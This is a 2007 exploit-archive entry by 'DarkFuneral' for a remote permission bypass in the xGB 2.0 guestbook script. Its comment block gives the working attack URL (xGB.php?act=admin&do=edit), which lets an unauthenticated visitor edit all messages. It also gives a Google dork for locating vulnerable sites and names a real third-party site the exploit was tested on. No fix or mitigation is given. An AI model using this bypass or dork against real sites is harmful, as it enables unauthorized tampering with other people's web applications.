xGB 2.0 (xGB.php) Remote Permission Bypass Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : xGB 2.0 (xGB.php) Remote Permission Bypass Vulnerability
# Published : 2007-08-29
# Author : DarkFuneral
# Previous Title : Ourspace 2.0.9 (uploadmedia.cgi) Remote File Upload Vulnerability
# Next Title : ABC estore 3.0 (cat_id) Remote Blind SQL Injection Exploit

/*
*
* xGB 2.0 (xGB.php) Remote Permission Bypass Vulnerability
* Bug discovered by DarkFuneral
* http://www.darkfuneral89.altervista.org/
*
* Affected Software: xGB
* CMS Site: "i don't know! :P"
* Severity: Critical
* Description: An attacker can edit all message in xGB
* Google Dork: allinurl:"xGb.php"
*
* E-Mail: darkfuneral89@gmail.com
* 
*
*
*
* Exploit Code: http://www.site.com/path/xGB.php?act=admin&do=edit
*
*
*
* Tested on www.culturebeach.de/guestbook.php
*
* Special Greetz to SystemFAILURE because I Love Him...
*
*/

# www.Syue.com [2007-08-29]